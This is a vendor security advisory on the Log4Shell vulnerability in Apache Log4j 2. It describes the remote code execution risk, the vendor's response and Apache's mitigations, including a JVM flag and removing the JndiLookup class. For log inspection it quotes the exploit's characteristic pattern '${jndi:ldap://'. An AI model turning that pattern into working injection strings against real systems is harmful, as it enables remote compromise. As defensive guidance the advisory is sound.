Forescout’s Response to CVE-2021-44228 Apache Log4j 2

On December 9th 2021, Apache published a zero-day vulnerability (CVE-2021-44228) for Apache Log4j being referred to as “Log4Shell”. This vulnerability has been classified as “Critical” with a CVSS score of 10, allowing for Remote Code Execution with system-level privileges.

When exploited, this vulnerability allows an attacker to run arbitrary code on the device, giving full control over to the attacker. Any device exploited should be considered compromised, potentially along with any devices that trusted the compromised device.

FinConDX 2021

Our Commitment to Security
Forescout has identified the affected components and is updating its systems and products. Forescout’s security team completed the investigation of its networks and found no evidence of compromise at this time and have updated all company rules and signatures of security solutions to detect and block any attempted to exploit our platforms and keep our defenders on high alert.

For the latest information on how to update your Forescout products, please refer to KB Article #12049.

Protecting Your Network
To address the vulnerability, Forescout recommends applying the latest security updates from Apache, you can review the information below.

If sensitive devices are identified, Forescout recommends attempting to mitigate the risk until patches can be applied. The following mitigations are recommended by Apache but should not be considered a complete solution:

  • In case the Log4j 2 vulnerable component cannot be updated, Log4J 2 versions 2.10 to 2.14.1 support the parameter log4j2.formatMsgNoLookups to be set to ‘true’, to disable the vulnerable feature. Ensure this parameter is configured in the startup scripts of the Java Virtual Machine:
    -Dlog4j2.formatMsgNoLookups=true.
  • Alternatively, customers using Log4j 2.10 to 2.14.1 may set the LOG4J_FORMAT_MSG_NO_LOOKUPS=”true” environment variable to force this change.
  • Users since Log4j 2.7 may specify %m{nolookups} in the PatternLayout configuration to prevent lookups in log event messages.
  • For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

In addition to the workaround and patches, the following simple mitigative actions can be taken.

  • Configuring a firewall to allow outgoing traffic to a trusted whitelist of addresses and protocols will prevent an attacker from communicating outside of the network.
  • Ensuring that logs are stored under different privileges will make it harder for attackers to cover their tracks. That will make discovery easier.
  • Exploitation attempts can be detected by inspecting log files for the characteristic URL pattern ${jndi:ldap://.

The post Forescout’s Response to CVE-2021-44228 Apache Log4j 2 appeared first on Forescout.

*** This is a Security Bloggers Network syndicated blog from Forescout authored by Forescout Research Labs. Read the original post at: https://www.forescout.com/blog/forescout%E2%80%99s-response-to-cve-2021-44228-apache-log4j-2/